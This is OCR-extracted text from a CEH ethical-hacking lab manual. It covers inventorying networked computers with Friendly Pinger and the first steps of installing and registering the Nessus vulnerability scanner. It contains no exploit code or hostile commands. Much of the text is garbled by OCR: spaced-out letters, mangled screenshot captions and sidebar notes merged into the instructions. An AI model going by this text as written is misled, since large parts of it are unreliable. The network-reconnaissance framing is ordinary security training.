1 5 . C l i c k t h e Inventory t a b f r o m m e n u b a r t o v i e w d i e c o n f i g u r a t i o n d e ta i ls
o f th e s e le c te d c o m p u te r

V F rie n d ly P in g e r fD e fa u lt.m a p l
T ^ rr‫־‬
£□ Audit software and Pk Edit V1«w Ping Notification S<*n FWat<hcr Irvcnto ry\Ndp________________
hardware components
installed on tlie computers
1‫ ג‬C a :* B S J \&\^ ‫* ׳‬
over the network
m E l Inventory Option!.‫״‬ Ctil-F#

Tracking user access

and files opened on your
computer via the network FIGURE 9.11: FPinger Inventory tab

1 6. T h e General t a b o f t h e Inventory w i z a r d s h o w s d i e com puter name

a n d i n s t a l l e d operating system

C EH Lab Manual Page 165 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

W Inventory
File E d it V ie w R eport O p tio n s H e lp

la e: 0 ‫־‬S ? 1 1 ■ E
W IN-D39MR5HL9E4 |g General[ Misc| M'j Hardware] Software{ _v) History| ^ K >

Computer/User

CQ Assignment of external Host name |W IN-D39MR5HL9E4

commands (like telnet, User name !Administrator
tracert, net.exe) to devices
W indows

Name |W indows Server 2012 Release Candriate Datacenter

Service pack

C otecton tme

Colecbon time 18/22 /2 0 12 11 :2 2:3 4 AM

FIGURE 9.12: FPinger Inventory wizard General tab

1 7 . T h e M isc t a b s h o w s t h e Netw ork IP addresses. MAC addresses. File

System , a n d Size o f t h e d is k s

Inventory x '
5 Search of
File E dit V ie w R eport O p tio n s H e lp
HTTP, FTP, e-mail
e i g? 0 ₪ *a a <^0
and other network
G*? fieneraj Misc hardware | Software | History |
services
Network

IP addresses 110.0.0.7

MAC addresses D4-BE-D9-C3-CE-2D

J o ta l space 465.42 Gb

Free space 382.12 Gb

Display $ettng$

display settings [ 1366x768,60 H z, T rue Color (32 bit)

Disk Type Free, Gb Size, Gb £ File System A

3 C Fixed 15.73 97.31 84 NTFS

Function "Create S D Fixed 96.10 97.66 2 NTFS
— - — ■—
Setup" allows to create a
lite freeware version with
your maps and settings

FIGURE 9.13: FPinger Inventory wizard Misc tab

18. T h e H ardw are t a b s h o w s t h e h a r d w a r e c o m p o n e n t d e ta i ls o f y o u r

n e tw o rk e d c o m p u te rs

C EH Lab Manual Page 166 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

TT
File Edit View Report Options Help

0 ^ 1 3 1 0
H w 1N-D39MFS5HL9E4|| General Miscl Mi H a rd w a re [^ ] Software History | < >1
4x Intel Pentium III Xeon 3093
B Memory
<2
4096 Mb
- Q j B IO S
Q| AT/AT COMPATIBLE D ELL •6222004 02/09/12
- £ ) ‫ י‬Monitors
Genetic Pn P Monitor
- ■V D isplays ad ap ters
B j ) lnte<R) HD Graphics Family
E O D isk drives
q ST3500413AS (Serial: W2A91RH6)
- ^ N etw ork ad ap ters
| j | @netrt630x64.inf,%rtl8168e.devicedesc%^ealtekPQeGBE Family Controller
-^ S C S I and R A ID controllers
@spaceport.inf,%spaceport_devicedesc%;Micro$oft Storage Spaces Controller

I J
FIGURE 9.14: FPinger Inventory wizard Hardware tab

1 9 . T h e So ftw are t a b s h o w s d i e i n s t a l l e d s o f t w a r e o n d i e c o m p u t e r s

Inventory -----------H
File Edit View Report Options Help

[£) Q
5r 0 ‫י‬€ 1 3 1 0
WIN-D39MR5HL9E4 G§* general | M ‫׳‬sc \ H«fdware| S Software | History | QBr < >

Adobe Reader X (10.1.3) A

eMaiTrackerPro
EPSON USB Display
Friendfy Priger
IntelfR) Processor Graphics
Java(TM) 6 Update 17
Q Visualization of Microsoft .NET Framework 4 Multi-Targeting Pack
Microsoft Appfcation Error Reporting
your computer Microsoft Office Excel MUI (English) 2010
Microsoft Office OneNote MUI (English) 2010
network as a Microsoft Office Outlook MUI (English) 2010
Microsoft Office PowerPoint MUI (English) 2010
beautiful Microsoft Office Proof (English) 2010
Microsoft Office Proof (French) 2010
animated screen Microsoft Office Proof (Spanish) 2010
V
O ff*** Prnnfirxi (Pnnli^hl ? flirt
T e ta S
Name

Version

Developer

Homepage | ft Go

FIGURE 9.15: FPinger Inventory wizard Software tab

L a b A n a ly s is

D o c u m e n t all d i e I P a d d r e s s e s , o p e n a n d c lo s e d p o r t s , s e r v ic e s , a n d p r o t o c o l s y o u
d is c o v e r e d d u r i n g d i e la b .

C EH Lab Manual Page 167 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

T o o l/U tility I n f o r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d

I P a d d r e s s : 1 0 .0 .0 .1 - 1 0 .0 .0 .2 0

F o u n d IP a d d re ss:

■ 1 0 .0 .0 .2
■ 1 0 .0 .0 .3
■ 1 0 .0 .0 .5
■ 1 0 .0 .0 .7

D e t a i l s R e s u l t o f 1 0 .0 .0 .7 :
j
F r i e n d l v P i n g» e r
■ C o m p u te r n a m e
■ O p e r a tin g s y s te m
■ IP A d d re ss
■ M A C a d d re ss
■ F ile s y s t e m
■ S iz e o f d i s k
■ H a rd w a re in fo rm a tio n
■ S o ftw a re in f o rm a tio n

Y O U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S RELATED TO
T H I S LAB.

Q u e s t io n s

1. D o e s F P i n g e r s u p p o r t p r o x y s e r v e r s fire w a lls?

2. E x a m i n e th e p r o g r a m m i n g o f la n g u a g e u s e d i n F P in g e r .

I n te r n e t C o n n e c tio n R e q u ire d

□ Yes 0 No

Pla tfo rm Supported

0 C lassroom 0 iL a b s

C EH Lab Manual Page 168 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Lab

Scanning a Network Using the

N essus Tool
Ness/zsallowsyou toremotelyaudita nehvorkanddeter/nineif it has beenbroken
into ormisusedin somenay.It alsoprovidestheability tolocally audita specific
machinefor vulnerabilities.
I C O N K E Y L a b S c e n a r io
7 = 7‫־‬
Valuable 111 t h e p r e v i o u s l a b , y o u l e a r n e d t o u s e F r i e n d l y P i n g e r t o m o n i t o r n e t w o r k
information
d e v i c e s , r e c e i v e s e r v e r n o t i f i c a t i o n , p i n g i n f o r m a t i o n , t r a c k u s e r a c c e s s v ia t h e
Test your n e t w o r k , v i e w g r a p h i c a l t r a c e r o u t e s , e tc . O n c e a t t a c k e r s h a v e t h e i n f o r m a t i o n
knowledge re la te d to n e tw o r k d e v ic e s , th e y c a n u s e i t as a n e n tr y p o i n t to a n e tw o r k f o r a
c o m p r e h e n s iv e a tta c k a n d p e r f o r m m a n y ty p e s o f a tta c k s ra n g in g f r o m D o S
Web exercise
a tta c k s to u n a u th o r iz e d a d m in is tra tiv e access. I f a tta c k e rs a re a b le to get
m W orkbook review tr a c e r o u t e in f o r m a t io n , th e y m i g h t u s e a m e t h o d o lo g y s u c h as fire w a lk in g to
d e t e r m i n e t h e s e r v i c e s t h a t a r e a l l o w e d t h r o u g h a f ir e w a ll.

I f a n a tta c k e r g a in s p h y s ic a l a c c e s s to a s w itc h o r o t h e r n e tw o r k d e v ic e , h e o r
s h e w ill b e a b l e t o s u c c e s s f u l l y i n s t a l l a r o g u e n e t w o r k d e v i c e ; t h e r e f o r e , a s a n
a d m in is tra to r, y o u s h o u ld d is a b le u n u s e d p o r ts in th e c o n f ig u r a tio n o f th e
d e v ic e . A l s o , i t is v e r y i m p o r t a n t t h a t y o u u s e s o m e m e t h o d o l o g i e s t o d e t e c t
s u c h r o g u e d e v ic e s 0 1 1 th e n e tw o rk .

A s a n e x p e r t ethical h ack er a n d penetration tester, y o u m u s t u n d e r s t a n d h o w

vulnerabilities, com pliance specifications, a n d content policy violations a r e
s c a n n e d u s i n g t h e Nessus t o o l .

L a b O b j e c t iv e s

T h i s l a b w ill g iv e y o u e x p e r i e n c e 0 1 1 s c a n n i n g t h e n e t w o r k f o r v u l n e r a b i l i t i e s ,
a n d s h o w y o u h o w t o u s e N e s s u s . I t w ill t e a c h y o u h o w to :

■ U s e th e N e s s u s to o l

■ S c a n th e n e tw o r k f o r v u ln e r a b ilitie s

C EH Lab Manual Page 169 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t

£ ‫ ז‬Tools T o c a n y o u t d ie la b , y o u n e e d :
demonstrated in
■ N e s s u s , l o c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning
this lab are
N etw orksW ulnerability Scanning Tools\Nessus
available in
D:\CEH- ■ Y o u c a n a ls o d o w n l o a d t h e l a t e s t v e r s i o n o f N e s s u s f r o m t h e l i n k
Tools\CEHv8 h t t p : / / w w w . t e n a b l e .c o m / p r o d u c t s / n e s s u s / n e s s u s - d o w n l o a d -
Module 03 a g re e m e n t
Scanning
Networks ■ I f y o u d e c i d e t o d o w n l o a d t h e latest version, t h e n s c r e e n s h o t s s h o w n
in th e la b m ig h t d if fe r

■ A c o m p u t e r r u n n i n g W indow s Server 2012

■ A w e b b ro w s e r w ith I n te r n e t access

■ A d m in is tr a tiv e p riv ile g e s to r u n th e N e s s u s to o l

L a b D u r a t io n

T im e : 2 0 M i n u te s

O v e r v ie w o f N e s s u s T o o l
m Nessus is public
Domain software related N e s s u s h e lp s s t u d e n t s t o le a r n , u n d e r s t a n d , a n d d e t e r m i n e vulnerabilities a n d
under the GPL.
w eaknesses o f a s y s te m a n d network 111 o r d e r t o k n o w h o w a s y s te m c a n b e
exploited. N e t w o r k v u ln e r a b ilitie s c a n b e network topology a n d OS
vulnerabilities, o p e n p o r t s a n d r u n n i n g s e r v ic e s , application and service
c o n f i g u r a t i o n e r r o r s , a n d a p p li c a ti o n a n d service vulnerabilities.

Lab T asks
8 TAs K 1 1. T o i n s t a l l N e s s u s n a v i g a t e t o D:\CEH-Tools\CEHv8 Module 03
Scanning Netw orksW ulnerability Scanning Tools\Nessus
Nessus
Installation 2. D o u b l e - c l i c k t h e Nessus-5.0.1-x86_64.msi file .

3. T h e Open File - Secu rity Warning w i n d o w a p p e a r s ; c li c k Run

O p e n File S e c u rit y W a r n in g ‫־ד‬5‫ך‬

Do you want to run this fie ?

fJan e‫־‬ 2 £&‫ר‬C.rrK

/lk g rt\A d m in irtrat0 r\D etH 0 D 'v N e cs1 K -5 0 -6

Pud sht‫׳‬: IcnaMc Network Security Int.

Type Windows Installer Package
From; G\U«ra\Adminottatot\Doklop\No>uj*5.0.2-*66 64‫״‬

Run CencH

"^7 Nessus is designed to

V Always esk cefcre opening the file
automate the testing and
discovery of known
Wh Jr fi:« from the Internet can be useful, this file type can potentially
security problems. j ) harm >our computer. Only run scfbveic from p ubltihen yen bust.
^ What s the nsk?

FIGURE 10.1: Open File ‫ ־‬Security Warning

C EH Lab Manual Page 170 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

4. T h e N essus - InstallShield Wizard a p p e a r s . D u r i n g t h e i n s t a l l a t i o n

p r o c e s s , th e w iz a r d p r o m p ts y o u f o r s o m e b a s ic in f o r m a tio n . F o llo w
d i e i n s t r u c t i o n s . C l i c k Next.

& Tenable Nessus (x64) ‫ ־‬InstallShield Wizard

W elcome to th e InstallShield Wizard for

Tenable N essus (x64)

The InstalSh1eld(R) Wizard wdl nstal Tenable Nessus (x64) on

m The updated Nessus your computer. To continue, ddc Next.
security checks database is
can be retrieved with
commands nessus-updated-
plugins.

WARNING: Ths program is protected by copyright law and

nternational treaties.

< Back Next > Cancel

FIGURE 10.2: The Nessus installation window

5. B e f o r e y o u b e g i n i n s t a l l a t i o n , y o u m u s t a g r e e t o t h e license agreem ent

a s s h o w n i n t h e f o l l o w i n g f ig u r e .

6. S e l e c t t h e r a d i o b u t t o n t o a c c e p t t h e l i c e n s e a g r e e m e n t a n d c li c k Next.

!‫;ל‬ Tenable Nessus (x64) - InstallShield Wizard

Q Nessus has the ability to License Agreement
test SSLized services such as
Please read the following kense agreement carefully.
http, smtps, imaps and more.

Tenable Network Security, Inc.

NESSUS®
software license Agreement

This is a legal agreement ("Agreement") between Tenable Network

Security, Inc., a Delaware corporation having offices at 7063 Columbia
Gateway Drive. Suite 100, Columbia, MD 21046 (“Tenable"), and you,
the party licensing Software (“You‫)״‬. This Agreement covers Your
permitted use of the Software BY CLICKING BELOW YOU
!unir.ATF v m iB Ar.r.FPTAMr.F n p tw /.q ArtPFPMFUT auh 0
accept the terms in the kense agreement Print
Nessus security scanner
includes NASL (Nessus O I do not accept the terms n the kense agreement
Attack Scripting Language).
InstalShiekJ-------------------------------------------
< Back Next > Cancel

FIGURE 10.3: Hie Nessus Install Shield Wizard

7. S e le c t a d e s t i n a t i o n f o l d e r a n d c li c k Next.

C EH Lab Manual Page 171 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Tenable Nessus (x64) - InstallShield Wizard

Destination Folder
Click Next to instal to this folder, or ckk Change to instal to a different folder.

Instal Tenable Nessus (x64) to:

Ibdl Nessus gives you the £> C:\Program F*es\TenableNessus \ Change...
choice for performing regular
nondestructive security audit
on a routinely basis.

InstalShield
< Back Next > Cancel

FIGURE 10.4: Tlie Nessus Install Shield Wizard

8. T h e w i z a r d p r o m p t s f o r Setup Type. W i d i d i e Complete o p t i o n , a ll

p r o g r a m f e a t u r e s w ill b e i n s t a l l e d . C h e c k Complete a n d c li c k Next.

Tenable Nessus (x64) ‫ ־‬InstallShield Wizard

Setup Type
Choose the setup type that best smts your needs.

Q Nessus probes a range

of addresses on a network to
determine which hosts are
alive.

FIGURE 10.5: The Nessus Install Shield Wizard for Setup Type

9. T h e N e s s u s w i z a r d w ill p r o m p t y o u t o c o n f i r m t h e i n s t a l l a t i o n . C li c k
Install

C EH Lab Manual Page 172 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Tenable Nessus (x64) - InstallShield Wizard

Ready to Install the Program
Nessus probes network The wizard is ready to begn nstalation.
services on each host to
obtain banners that contain Click Instal to begn the nstalatoon.
software and OS version
information If you want to review or change any of your installation settings, dfck Back. Ckk Cancel to
exit the wizard.

InstalShield
< Back Instal Cancel

FIGURE 10.6: Nessus InstallShield Wizard

1 0 . O n c e i n s t a l l a t i o n is c o m p l e t e , c li c k Finish.

Tenable Nessus (x64) ‫ ־‬InstallShield Wizard

In stalS hield W izard Completed

Q Path of Nessus home The InstalShield Wizard has successfuly nstaled Tenable
Nessus (x64). Ckk Finish to exit the wizard.
directory for windows
\programfiles\tanable\nessus

Cancel

FIGURE 10.7: Nessus Install Shield wizard

Nessus Major D irectories

■ T l i e m a j o r d i r e c t o r i e s o f N e s s u s a r e s h o w n i n t h e f o l l o w i n g ta b l e .

C EH Lab Manual Page 173 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Nessus Home Directory Nessus Sub-Directories Purpose

1Windows
\Program \conf Configuration files
Files\Tenable\Nessus
\data Stylesheet templates
feUI During the installation
and daily operation of \nessus\plugins Nessus plugins
Nessus, manipulating the
\nassus\us«rs\<username>\lcbs User knowledgebase
Nessus service is generally not
saved on disk
required
\no33us\logs , Nessus log files
>-------------------------------- -1 --------------------1
TABLE 10.1: Nessus Major Directories

11. A f te r in s ta lla tio n N e s s u s o p e n s in y o u r d e fa u lt b ro w s e r.

1 2 . T h e W elcom e to Nessus s c r e e n a p p e a r s , c li c k d i e here l i n k t o c o n n e c t

v ia S S L

w e lc o m e to Nessus!
PI m m c o n n e c t v i a S S L b y c lic k in c J h » r « .

You are hkely to get a security alert from your web browser saying that the SS L certificate is invalid. You may either choose to temporarily accept the risk, or
can obtain a valid S S L certificate from a registrar. Please refer to the Nessus documentation for more information.

FIGURE 10.8: Nessus SSL certification

1 3 . C li c k OK i n t h e Secu rity Alert p o p - u p , i f i t a p p e a r s

Security Alert
— The Nessus
J j You are about to view pages over a secure connection.
Server Manager
used in Nessus 4 ‫ע‬ Any information you exchange with this site cannot be
has been viewed by anyone else on the web.
deprecated
^In the future, do not show this warning

OK More Info

FIGURE 10.9: Internet Explorer Security Alert

14. C li c k t h e Continue to this w ebsite (not recommended) l i n k t o

c o n tin u e

C EH Lab Manual Page 174 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

X Snagit g j £t
& * ^ II C crtfica te Error: M avigation... '
1
There is a problem with this website's security certificate.

The security certificate presented by this w ebsite w as not issued b y a trusted certificate authority.
The security certificate presented by this websrte w as issued fo r a different w eb site s address.

Sccu n ty certificate problem s m a y indicate an ottem pt to fool y o u o r intercept a n y data you send to the
server.

W c recommend that you close this webpage and do not continue to this website.

d Click here to close this webpage.

0 Continue to this website (not recommended).

M ore information

FIGURE 10.10: Internet Explorer website’s security certificate

1 5. o n OK i n t h e Secu rity Alert p o p - u p , i f i t a p p e a r s .

£Q! Due to die technical

implementation of SSL Security Alert
certificates, it is not possible
to ship a certificate with
Nessus that would be trusted 1C. i ) You are about to view pages over a secure connection
to browsers tr Any information you exchange with this site cannot be
viewed by anyone else on the web.

H I In the future, do not show this warning

OK More Info
1
FIGURE 10.11: Internet Explorer Security Alert

1 6 . T h e Thank you for installing Nessus s c r e e n a p p e a r s . C l i c k t h e Get

Started > b u t t o n .

R ff
W elcom e to N e s s u s ‫׳‬
T W ik you foi liintrtllli •j tin• w uM 1 •>>< h * H i N m iii •v* tflknv y!>u l <1 portoim
m warning, a custom 1I *ah 3pe«d vukierntilNty diSEOvery. to detem\r* *tven hcets are rumlna wttich se1v1r.es
1 A1j« n lU 1a1 mtrlili mj, la 1m U w t« no Im l )■ » ia •acurlly |W ■I w.
certificate to your >L-umplianca chocks, to verify and prove that « v v , host on your network adheres to tho security pokey you 1
‫ י‬Scan sehwliJnm, to automatically rui *cant at the freijwncy you
organization must be used ‫ ׳‬And morel

!!•< stofted *

FIGURE 10.11: Nessus Getting Started

1 7 . 111 Initial Account Setup e n t e r t h e c r e d e n t i a l s g i v e n a t t h e t i m e o f

r e g i s t r a t i o n a n d c li c k Next >

C EH Lab Manual Page 175 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

p • o («*•*<‫»*״‬.‫>״‬.e c Wefconeu Neaus

In itia l Account Setup

First, w e need to create an admin user for the scanner. This user will have administrative control on the scanner; the admin has the ability to create/deiete
users, stop ongoing scans, and change the scanner configuration.

loo*n: admin

Confirm P«*Mword:
< Prev | Next > |

Because f/* admin user can change the scanner configuration, the admin has (he ability to execute commands on the remote host. Therefore, It should be
i that the admin user has the same privileges as the *root ‫( ״‬or administrator) user on the remote ho:

FIGURE 10.12: Nessus Initial Account Setup

1 8 . 111 Plugin Feed Registration, y o u n e e d t o e n t e r d i e a c t i v a t i o n c o d e . T o

o b t a i n a c t i v a t i o n c o d e , c li c k t h e http://www.nessus.org/register/ lin k .
19. C li c k t h e Using Nessus at Home i c o n i n Obtain an Activation Code

> ■ el

m If you are using Hie m i (A *CAftCM i n ‫ז‬

Tenable SecurityCenter, the <9>T E N A B L E Network Security*
Activation Code and plugin I n Certift&ttH)!! Resource* Supicot
updates are managed from
SecurityCenter. Nessus needs
if'tMhk■ ProdiKls
to be started to be able to
communicate with * Protfua Ovenfe Obtain an Activation Code
SecurityCenter, which it wfll Nk s u i AudHai
Using Nesaus at Work? Using Nessus at Home?
n lu 1.
normally not do without a '!‫•••׳‬Ml‫ ׳‬Plug**
A
wuk1uV4cM * fu< ail
A Ham■( ■ml »m>*Cripr«l Is
Dm jn l toth tm Mia ootj
valid Activation Code and
plugins .Sjirplr Report!
N«MUi FAQ
Vk«le D»14CMFAQ in
Dtptovmam 1>:001u
Mowus Evukoiion
Training

FIGURE 10.13: Nessus Obtaining Activation Code

2 0 . 111 N essus for Home a c c e p t t h e a g r e e m e n t b y c l i c k i n g t h e Agree b u t t o n

a s s h o w n in th e fo llo w in g fig u re .

C EH Lab Manual Page 176 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Wckcme 10Mawt ■ Mom fc<Mama|t«nat1l«

ow*« m ss
t *vtl ProtoiaiOAilFaed iubbcflbaf* enjty You mat •otu u 1
. The Netare rtoaaafocd
do*1 *c* gn* you i o : w to of 1K0v>yov to perform <
Product Ovenv* dedR 0( *S* Tw Nes*u» llrtual
Faaiuraa
1 Nmhh Hom Fnd Mibscilpllon it a■alatile lot ptnoia) mm ‫ •י‬a I
Nossue Buwwct ( o• tf. * Is ink lot use by any commercial otqam/atn■ t !on 1q «t!
Noasus ter Homa c*«»*| or vw *Inm * iiw M n i tr.iinrvj
W*y to New#* ‘t‫’־‬ Trtontoa Ptoarjm tor 0<>1r(;■ttionf.
Nesius V « 1lf A!(n ‫ » ז‬a ro a jJ •#! 1k* M m ii HowFbwJ Mtncri|40n lot lo » 1 «m | f c w cfe* ‘^7 ‫ ’••׳‬to
k u « i *to turn• 01•M 4ml bwjln iho <Jc‫׳‬#nlMd prooaat•

N W III PluflM
SU8VCWII0M ACM I Ml NI

S41v(Ju Rapotto
N m a i fAQ •‫* «׳״‬Suy^otW w m •‫•יי‬Ini 01 Ope‫״‬nlr*j SyvtMn otwMbwaowi) moa>«»« 1■to•
IVrjalAQor rtaouis fA<J lound cti arr, lenaUa1mvCcI
•vaeelto ncto«n| n n u n M o iy
M<«I6 Dtotc** FAQ K» •• Ratoawonarf-aod S«4xc>|pt«n You agiaa 10 r«v * «*•<> «<«* to• to
Tt^aUa to••ach ayatoan on which You have inttaltod a Prjntr'Kl Scama•
Deployment Options T‫<«» ׳‬pj Ojaniriton MiVAPthntandiuj 1N» pit^ifcrtcn ow cotnwcM »a* m
S*C»m 2141.1 Vau ara * *atimj 01!>trifi10n You m*» copy M M iwget * 4
•MMMaM T t N t V t »IM«M Md Tm1U» HonMF«*d s<Mot*«M rwgto to
— <1rt>to »1*dto« *♦ ew‫׳‬w00‫׳‬tn teeing onV Upon eompte^oti ot #* d m t*»
rigM to * a lt>« Pkj£n& ptmUtod by to* HomaFaad SubfeuipCanis

Ptc/w*‘. ;■wFwd SK.t‫־‬vjlp‫־‬i:»1 («. *(fle a b*e n *•‫־‬,ox !tent# •*> toe Suts<‫־‬i *
*0 ‫״‬c«aa( an r«ftj (of 4nd pay 81) !« ‫■׳‬>associated « P Tmi
Su&ttrfpaa• You awv not u&a tw H>r‫ *׳‬f sad Subscripted 91anted to You lot
* ‫■!־‬inj pu>p0M± to aacuf• Y«u>01 any third party's, laatwoifcs or to any etoa■
tw cl«M«o« taning h * rorvpioductrxi «nv»or1‫׳‬r>*r1• T e a M a m
tofanuci a fr«* Sut«rp#on undat this Suction 21c|al t coti
apmant and DiMnbttoan
C is t* Metsus Ftogm Deralopment 1 tenable I
« & ‫ ״‬JM ■am at lha Subbcitpttaoa 10wtto and dovobp 1

FIGURE 10.14: Nessus Subscription Agreement

21 F ill i n t h e R egister a Hom eFeed s e c t i o n t o o b t a i n a n a c t i v a t i o n c o d e

a n d c li c k Register.
S l f you do not
register your copy
of Nessus, you ENTER SEARCH TEXT GO!
* TEN A BLE Network Security
will not receive
Partner* 1raining li fortification Resources Si port
any new plugins >paint |

and will be unable

!enableProducts
to start the
Product O v m v Iow Register a HomeFeed
Nessus server.
No s m s Auditor OuniSes T0 May up todato with 11m* Nut.uit. pljgint you n w tl tt>■; 1«#h4vjfed
Note: The etrnU iMlilte-11 to utilch an activation code wll be *ert Ye 1 1 U nil! not I
>

‫ס‬
N«84u « Ptu^lns
th a r td with any 3rd patty.

Activation Code is Documentation

Sample Repoita
not case N*5»u 9 FAQ

sensitive. Motde Devices FAQ

Deployment Options ■
‫• ־‬am» * con^

Nes3u3 Evaluation □ Check lo receive updates from Tenable

Training | Hpql^ter |

FIGURE 10.15: Nessus Registering HomeFeed

2 2 . T h e Thank You for Registering w i n d o w a p p e a l s f o r Tenable Nessus

HomeFeed.

C EH Lab Manual Page 177 Ethical Hacking and Countermeasures Copyright C by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

. ‫׳‬V j . *>■« Y«.to ‫י‬

ENTER SEARCH IE■(

TENABLE Network Security1

Solutions Products Services Partners iraimna & certification Resources Support Atout !enable Store
>print | » sltare Q

T en able P ro d u c ts Tenable Charitable & !raining

Organization Program
Thank You for Registering!
nessus Tenable N c t in il Security offers Nessus
l ‫ ׳‬rot••won•( •*4 •uMcnpcon• •t no
Thank jrou tor reghlMlag your I eonbit‫ ׳‬Nt-viun HomeFeed An
emal conraMng w a activation 604• hA* just boon Mint to you cod to ct1*ftut4• oroartaation• I
•l tie email K k tm you pravWed

Please note *at tie !enable Nessus HomeFeed h uvislUiMt- for

Product Overview home um oo»r If you wantto use Nasaus at your place of
business, you nuat ouicnase the Nessus Proleaaowageed
Nessus Auditor
Akemaiet. you nay purchase a subscriptionto the Nessus
Bundles
PofimoHM Sarnica and scan in tM cioudl Tha N a ttu i Ponawlci
Nessus Plugins Service does no( require any software download.
Documentation For more mtetraabon on t w HomsFeed. Professional eed and
217After the initial Sample Reports Nessus Perimeter Sec.ice. please visit our Discussions Forum.

Nessus FAQ
registration, Mobile Devices FAQ

Nessus will Deployment Options

download and S m u t Evaluation

I raining
compile the
FIGURE 10.16: Nessus Registration Completed
plugins obtained
from port 443 of 2 3 . N o w lo g in to y o u r e m a il f o r th e a c tiv a tio n c o d e p r o v id e d a t th e tim e o f
plugins.nessus.or r e g is tr a tio n as s h o w n in th e fo llo w in g fig u re .
gplugins- <d •uflKfccjr

customers.nessus P
|
X _ uSmqSma yaH00.C0‫׳‬n ' •

- Sm>Cu1 Omu >

.org
Y a h o o ! m a il

1b4e Homefeeo Activation CoO* MIMDttalt

‫ י‬NMtut K ig L iio i •
10 aw‫ ■ ׳‬. ■ounoooor*

th«r* )Oulw rtanlairtj row N n w i m » w 1 * w

sully gcannng
Th* W««U» Hamafaad gubKiCton will >*er |M» Netful 1
<• %) «w* •‫ *י‬tiel*le41■lupntlw

»you usa rusius n ‫ ג‬professorial 09301 10u a ftcftsslcruiFoaa suBcagimi

ms •r, 3onMme 0» n‫׳‬cu ir-n‘1-4 *aorta \-‫ ״־‬is >0u •11t1wo»repsK<trasc3rr>»ri1(».f1if10t.‫ו‬ ‫ ‘ •**׳‬:

C « «u sn g 1nt srcceSires Stlpw.

i 1
PtaawconW t If!• Nmmii n*tt »wn ^•9» ■w* ^ . ,Twwjuaiiu.'Ui'ntrHntantMuyMHiiimuum" ‫• ***יי ״‬ I cnm ««!• STOCMt
Ne inttmal Aixeii «‫ ״‬i w Mnaui *‫ « *׳‬- '‫׳‬
M>t« tl'MU• inttiiiilnr camoi‫ •׳‬a t * 1 ‫•׳‬ t— «** ‫״‬e»a *aM e• in anamit* p‫«»״״‬.»* y>p* tia uw. ana c*>»* >* 1• ‫•יזו‬MatpUJ-<n»
You an Andottna ic-jlsti 1t»jr m ilv a n at

M t x caaa toittiaiaftBfl

FIGURE 10.17: Nessus Registration mail

2 4 . N o w e n t e r t h e a c t i v a t i o n c o d e r e c e i v e d t o y o u r e m a i l I D a n d c li c k Next.

C EH Lab Manual Page 178 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

F " • ‫ ״‬- ,®[‫ ן‬Wekcm* 10 Meuvt 9

P l u g in Feed R e g is t r a t io n

As• information about new vulnerabilities 18 discovered and released into the public domain, Tenabte's research staff designs programs ("plugins”) that enable
Nessus to detect their presence. The plugins contain vulnerability Information, the algorithm to test for the presence of the security Issue, and a set of
remediation actions. To use Nessus, you need to subscribe to a "Plugin Feed*. You can do so by voting http 7/www.nessus.orQyreolster/ to obtain an
Activation Code.

IbsdJ Once the plugins liave • To use Nessus at your workplace, pufdiaae a commetG d Prgfcaatonalfccd
11
• To um NcMuti at In a non ■commercial homo environment, you can get HomeFeed (or free
been downloaded and • Tenable SecurltvCentor usore: Enter 'SoairltyCenter* In the field below
compiled, the Nessus GUI • To perform offline plugin updates, enter 'offline' In the field below

will initialize and the Nessus Activation Code

server will start
Please enter your Activation Code:|9061-0266-9046-S6E4-l8£4| x|

Optional Proxy Settings

< Prev Next >

FIGURE 10.18: Nessus Applying Activation Code

2 5 . T h e Registering w i n d o w a p p e a r s a s s h o w n i n d i e f o l l o w i n g s c r e e n s h o t .

C * *-ho* P • 0 Cc**uttemH SC J wefc<•*‫<׳‬to m ft * o

fx Bs~** ■ d 1

R e g is t e r in g . . .

Registering the scanner with Tenable...

FIGURE 10.19: Nessus Registering Activation Code

2 6 . A f t e r s u c c e s s f u l r e g i s t r a t i o n c li c k , Next: Download plugins > t o

d o w n lo a d N e s s u s p lu g in s .

m Nessus server P • O Ce*rt<*e««o« & C | WetconetoNessus

■ ‫־ ־‬
‫׳ ־‬- * ‫יי‬
ft * o
configuration is managed via ‫[ן‬x a =f
the GUI Tlie nessusdeonf
